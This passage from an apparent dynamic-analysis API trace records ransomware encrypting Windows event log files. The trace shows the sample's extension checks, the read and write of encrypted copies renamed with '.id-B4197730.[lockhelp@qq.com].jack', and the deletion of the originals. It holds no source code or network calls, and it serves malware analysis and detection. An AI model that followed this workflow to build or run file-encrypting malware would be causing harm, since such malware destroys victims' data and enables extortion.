lpString2="evtx") returned -1 [0205.827] lstrlenW (lpString=".7z") returned 3 [0205.827] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.827] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0205.827] lstrlenW (lpString=".dbf") returned 4 [0205.827] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.828] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0205.828] lstrlenW (lpString=".1cd") returned 4 [0205.828] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.828] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0205.828] lstrlenW (lpString=".jpg") returned 4 [0205.828] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.828] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.828] lstrlenW (lpString="Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 46 [0205.828] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0205.828] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0205.828] CloseHandle (hObject=0x430) returned 1 [0205.828] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx")) returned 0x20 [0205.829] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.829] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0205.829] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.829] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.829] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0205.829] GetLastError () returned 0x0 [0205.829] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0205.832] WriteFile (in: hFile=0x440, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0205.836] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.836] WriteFile (in: hFile=0x440, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x130, lpOverlapped=0x0) returned 1 [0205.836] SetEndOfFile (hFile=0x440) returned 1 [0205.836] CloseHandle (hObject=0x440) returned 1 [0205.838] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.838] SetEndOfFile (hFile=0x430) returned 1 [0205.840] CloseHandle (hObject=0x430) returned 1 [0205.840] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0205.840] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx")) returned 1 [0205.841] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0205.841] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0205.841] lstrlenW (lpString=".doc") returned 4 [0205.841] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.841] lstrlenW (lpString=".docx") returned 5 [0205.841] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.841] lstrlenW (lpString=".pdf") returned 4 [0205.841] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.841] lstrlenW (lpString=".xls") returned 4 [0205.841] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.841] lstrlenW (lpString=".xlsx") returned 5 [0205.841] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.841] lstrlenW (lpString=".ppt") returned 4 [0205.841] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.841] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0205.841] lstrlenW (lpString=".zip") returned 4 [0205.841] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.841] lstrlenW (lpString=".rar") returned 4 [0205.841] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.841] lstrlenW (lpString=".bz2") returned 4 [0205.841] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.841] lstrlenW (lpString=".7z") returned 3 [0205.841] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.841] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0205.841] lstrlenW (lpString=".dbf") returned 4 [0205.841] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0205.842] lstrlenW (lpString=".1cd") returned 4 [0205.842] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0205.842] lstrlenW (lpString=".jpg") returned 4 [0205.842] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0205.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0205.842] lstrlenW (lpString=".doc") returned 4 [0205.842] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.842] lstrlenW (lpString=".docx") returned 5 [0205.842] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.842] lstrlenW (lpString=".pdf") returned 4 [0205.842] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.842] lstrlenW (lpString=".xls") returned 4 [0205.842] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.842] lstrlenW (lpString=".xlsx") returned 5 [0205.842] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.842] lstrlenW (lpString=".ppt") returned 4 [0205.842] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.842] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0205.842] lstrlenW (lpString=".zip") returned 4 [0205.842] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.842] lstrlenW (lpString=".rar") returned 4 [0205.842] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.842] lstrlenW (lpString=".bz2") returned 4 [0205.843] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.843] lstrlenW (lpString=".7z") returned 3 [0205.843] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.843] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0205.843] lstrlenW (lpString=".dbf") returned 4 [0205.843] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.843] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0205.843] lstrlenW (lpString=".1cd") returned 4 [0205.843] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.843] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0205.843] lstrlenW (lpString=".jpg") returned 4 [0205.843] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.843] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.843] lstrlenW (lpString="Microsoft-Windows-AppReadiness%4Admin.evtx") returned 42 [0205.843] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0205.844] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0205.844] CloseHandle (hObject=0x430) returned 1 [0205.844] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx")) returned 0x20 [0205.844] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.844] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0205.844] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.844] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.844] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0205.845] GetLastError () returned 0x0 [0205.845] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0206.004] WriteFile (in: hFile=0x440, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0206.007] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0206.007] WriteFile (in: hFile=0x440, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x128, lpOverlapped=0x0) returned 1 [0206.007] SetEndOfFile (hFile=0x440) returned 1 [0206.007] CloseHandle (hObject=0x440) returned 1 [0206.009] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.009] SetEndOfFile (hFile=0x430) returned 1 [0206.012] CloseHandle (hObject=0x430) returned 1 [0206.012] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0206.012] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx")) returned 1 [0206.012] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0206.012] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0206.012] lstrlenW (lpString=".doc") returned 4 [0206.012] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0206.012] lstrlenW (lpString=".docx") returned 5 [0206.013] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0206.013] lstrlenW (lpString=".pdf") returned 4 [0206.013] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0206.013] lstrlenW (lpString=".xls") returned 4 [0206.013] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0206.013] lstrlenW (lpString=".xlsx") returned 5 [0206.013] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0206.013] lstrlenW (lpString=".ppt") returned 4 [0206.013] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0206.013] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0206.013] lstrlenW (lpString=".zip") returned 4 [0206.013] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0206.013] lstrlenW (lpString=".rar") returned 4 [0206.013] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0206.013] lstrlenW (lpString=".bz2") returned 4 [0206.013] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0206.013] lstrlenW (lpString=".7z") returned 3 [0206.013] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0206.013] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0206.013] lstrlenW (lpString=".dbf") returned 4 [0206.013] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0206.013] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0206.013] lstrlenW (lpString=".1cd") returned 4 [0206.013] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0206.013] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0206.013] lstrlenW (lpString=".jpg") returned 4 [0206.013] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0206.014] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0206.014] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0206.014] lstrlenW (lpString=".doc") returned 4 [0206.014] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0206.014] lstrlenW (lpString=".docx") returned 5 [0206.014] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0206.014] lstrlenW (lpString=".pdf") returned 4 [0206.014] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0206.014] lstrlenW (lpString=".xls") returned 4 [0206.014] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0206.014] lstrlenW (lpString=".xlsx") returned 5 [0206.014] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0206.014] lstrlenW (lpString=".ppt") returned 4 [0206.014] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0206.014] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0206.014] lstrlenW (lpString=".zip") returned 4 [0206.014] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0206.014] lstrlenW (lpString=".rar") returned 4 [0206.014] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0206.014] lstrlenW (lpString=".bz2") returned 4 [0206.014] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0206.014] lstrlenW (lpString=".7z") returned 3 [0206.014] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0206.014] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0206.014] lstrlenW (lpString=".dbf") returned 4 [0206.014] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0206.014] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0206.014] lstrlenW (lpString=".1cd") returned 4 [0206.015] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0206.015] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 50 [0206.015] lstrlenW (lpString=".jpg") returned 4 [0206.015] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0206.015] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0206.015] lstrlenW (lpString="Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 50 [0206.015] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0206.015] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0206.015] CloseHandle (hObject=0x430) returned 1 [0206.015] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx")) returned 0x20 [0206.015] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0206.016] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0206.016] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.016] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.016] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0206.016] GetLastError () returned 0x0 [0206.016] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0206.031] WriteFile (in: hFile=0x440, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0206.033] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0206.033] WriteFile (in: hFile=0x440, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x138, lpOverlapped=0x0) returned 1 [0206.033] SetEndOfFile (hFile=0x440) returned 1 [0206.033] CloseHandle (hObject=0x440) returned 1 [0206.037] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.037] SetEndOfFile (hFile=0x430) returned 1 [0206.039] CloseHandle (hObject=0x430) returned 1 [0206.039] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0206.039] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx")) returned 1 [0206.039] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0206.039] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0206.039] lstrlenW (lpString=".doc") returned 4 [0206.039] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0206.039] lstrlenW (lpString=".docx") returned 5 [0206.040] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0206.040] lstrlenW (lpString=".pdf") returned 4 [0206.040] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0206.040] lstrlenW (lpString=".xls") returned 4 [0206.040] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0206.040] lstrlenW (lpString=".xlsx") returned 5 [0206.040] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0206.040] lstrlenW (lpString=".ppt") returned 4 [0206.040] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0206.040] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0206.040] lstrlenW (lpString=".zip") returned 4 [0206.040] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0206.040] lstrlenW (lpString=".rar") returned 4 [0206.040] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0206.040] lstrlenW (lpString=".bz2") returned 4 [0206.040] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0206.040] lstrlenW (lpString=".7z") returned 3 [0206.040] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0206.040] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0206.040] lstrlenW (lpString=".dbf") returned 4 [0206.040] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0206.040] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0206.040] lstrlenW (lpString=".1cd") returned 4 [0206.040] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0206.040] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0206.040] lstrlenW (lpString=".jpg") returned 4 [0206.040] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0206.041] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0206.041] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0206.041] lstrlenW (lpString=".doc") returned 4 [0206.041] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0206.041] lstrlenW (lpString=".docx") returned 5 [0206.041] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0206.041] lstrlenW (lpString=".pdf") returned 4 [0206.041] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0206.041] lstrlenW (lpString=".xls") returned 4 [0206.041] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0206.041] lstrlenW (lpString=".xlsx") returned 5 [0206.041] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0206.041] lstrlenW (lpString=".ppt") returned 4 [0206.041] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0206.041] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0206.041] lstrlenW (lpString=".zip") returned 4 [0206.041] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0206.041] lstrlenW (lpString=".rar") returned 4 [0206.041] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0206.041] lstrlenW (lpString=".bz2") returned 4 [0206.041] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0206.041] lstrlenW (lpString=".7z") returned 3 [0206.041] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0206.041] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0206.041] lstrlenW (lpString=".dbf") returned 4 [0206.041] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0206.041] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0206.041] lstrlenW (lpString=".1cd") returned 4 [0206.041] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0206.041] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0206.042] lstrlenW (lpString=".jpg") returned 4 [0206.042] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0206.042] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0206.042] lstrlenW (lpString="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 56 [0206.042] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0206.042] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=2166784) returned 1 [0206.042] CloseHandle (hObject=0x430) returned 1 [0206.042] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx")) returned 0x20 [0206.042] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0206.043] MoveFileW 